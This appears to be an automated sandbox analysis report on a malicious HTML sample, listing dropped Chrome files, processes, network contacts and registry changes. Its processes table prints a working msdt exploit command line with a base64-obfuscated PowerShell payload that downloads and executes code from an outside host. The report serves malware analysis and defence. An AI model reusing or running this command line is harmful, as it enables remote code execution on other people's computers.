Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
1.html
|
HTML document, ASCII text, with very long lines, with CRLF line terminators
|
initial sample
|
||
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecoveryCRX.crx
|
Google Chrome extension, version 3
|
dropped
|
||
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\manifest.json
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\1636aa9d-3111-4a5c-843c-94249e78b200.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\4f00f4dd-4d61-4a8f-a33c-d99f5834a4dd.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\5c74f169-4077-46da-8357-ae9c63af9761.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\646b25b4-9e2a-466d-a8b1-89001cded742.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\78810434-2722-4012-abaa-07d79d32a1eb.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\92355d72-a90c-4b7b-bc8c-2ba970f452bc.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0168d31b-89b6-4dd6-8f26-9bb9f3352779.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\086bb8f0-72ec-4e10-add1-7448defa4df3.tmp
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1a82ff71-aec4-4559-9204-4e9cb29a979e.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\22684be1-e6cb-4b2d-98bd-b59a8fa29d34.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\39eda3ed-a8ec-43b7-a6a7-fbea533e1abe.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\3a53e226-65a9-4b7e-aa39-1bea417fdacb.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9f33b41f-c991-42da-83f3-c8e35c941eae.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\176bd4d4-b466-471c-b2dc-78592e59bf93.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\24aeaaec-c6e1-418d-ae0b-78d4b9410155.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a182358f-eeb0-4c96-9334-2c24d711a51e.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a5fa01d0-fad4-43b5-8785-f3c7de3bd90b.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a7329646-d142-463e-9e85-cbe79cec5f02.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a7b4c3e0-85bc-4988-85b0-22eefd7dd155.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cf283538-1e5c-40e6-b45c-1da386ddde2d.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\e698de8a-1c3b-45bb-9948-ed52f4c50d4a.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\27\scoped_dir5208_1786759565\Ruleset
Data
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\a2ad74ca-9388-4264-854b-475f1f4c3227.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\bab41e6d-e4c8-4eca-b536-aebebfdeb89b.tmp
|
PGP symmetric key encrypted data - Plaintext or unencrypted data salted -
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\c12f6f20-8069-49bd-9fce-f002e4790bab.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\d58fecef-1e86-45e9-a082-7f7bade77c38.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\dae76324-67e3-4336-89a9-4163bb26c366.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\dc9b2ef3-856c-4f76-8861-fed0a9519e8d.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\ef178d2b-96e6-4705-990d-3be3079274de.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\f11e4174-598a-40e4-b559-02beed15faec.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\f2e5f5ea-4b77-4abe-a4fb-c000703053ef.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\229f6fa7-84c3-4f31-aa76-91ac60469b60.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5208_26784880\Recovery.crx3
|
Google Chrome extension, version 3
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5208_26784880\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5208_26784880\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5208_26784880\manifest.json
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5208_646319911\Filtering Rules
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5208_646319911\LICENSE.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5208_646319911\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5208_646319911\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5208_646319911\manifest.json
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\6b74ac1a-eb2d-45dd-9ac1-64a7b726e330.tmp
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\229f6fa7-84c3-4f31-aa76-91ac60469b60.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\bg\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\ca\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\cs\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\da\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\de\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\el\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\en\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\en_GB\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\es\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\es_419\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\et\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\fi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\fil\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\fr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\hi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\hr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\hu\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\id\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\it\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\ja\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\ko\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\lt\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\lv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\nb\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\nl\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\pl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\pt_BR\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\pt_PT\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\ro\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\ru\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\sk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\sl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\sr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\sv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\th\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\tr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\uk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\vi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\zh_CN\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\zh_TW\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\craw_background.js
|
ASCII text, with very long lines
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\craw_window.js
|
ASCII text, with very long lines
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\css\craw_window.css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\html\craw_window.html
|
HTML document, ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\flapper.gif
|
GIF image data, version 89a, 30 x 30
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\icon_128.png
|
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\icon_16.png
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\topbar_floating_button.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\topbar_floating_button_close.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\topbar_floating_button_hover.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\topbar_floating_button_maximize.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\topbar_floating_button_pressed.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\manifest.json
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 112 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\1.html
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072
--lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
|
||
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
|
||
C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
|
C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
|
||
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe
|
"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96}
--browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://dns.google
|
unknown
|
||
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
|
unknown
|
||
https://www.google.com/intl/en-US/chrome/blank.html
|
unknown
|
||
https://ogs.google.com
|
unknown
|
||
https://www.google.com/images/cleardot.gif
|
unknown
|
||
https://play.google.com
|
unknown
|
||
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
142.251.209.13
|
||
https://payments.google.com/payments/v4/js/integrator.js
|
unknown
|
||
https://easylist.to/)
|
unknown
|
||
https://sandbox.google.com/payments/v4/js/integrator.js
|
unknown
|
||
https://www.google.com/images/x2.gif
|
unknown
|
||
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
142.250.184.78
|
||
https://accounts.google.com/MergeSession
|
unknown
|
||
https://creativecommons.org/compatiblelicenses
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://www.google.com/images/dot2.gif
|
unknown
|
||
https://github.com/easylist)
|
unknown
|
||
https://creativecommons.org/.
|
unknown
|
||
https://accounts.google.com
|
unknown
|
||
https://clients2.googleusercontent.com
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
https://www.google.com/accounts/OAuthLogin?issueuberauth=1
|
unknown
|
||
https://www.google.com/
|
unknown
|
||
https://www-googleapis-staging.sandbox.google.com
|
unknown
|
||
https://clients2.google.com
|
unknown
|
||
https://clients2.google.com/service/update2/crx
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
accounts.google.com
|
142.251.209.13
|
||
clients.l.google.com
|
142.250.184.78
|
||
clients2.google.com
|
unknown
|
||
time.windows.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
142.250.184.78
|
clients.l.google.com
|
United States
|
||
192.168.2.1
|
unknown
|
unknown
|
||
142.251.209.13
|
accounts.google.com
|
United States
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mfehgcgbbipciphmccgaenjidiccnmng
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
pkedcjkdefgpdelpbcmbmeomcjbeemfm
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
dr
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blacklist_cache_md5_digest
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
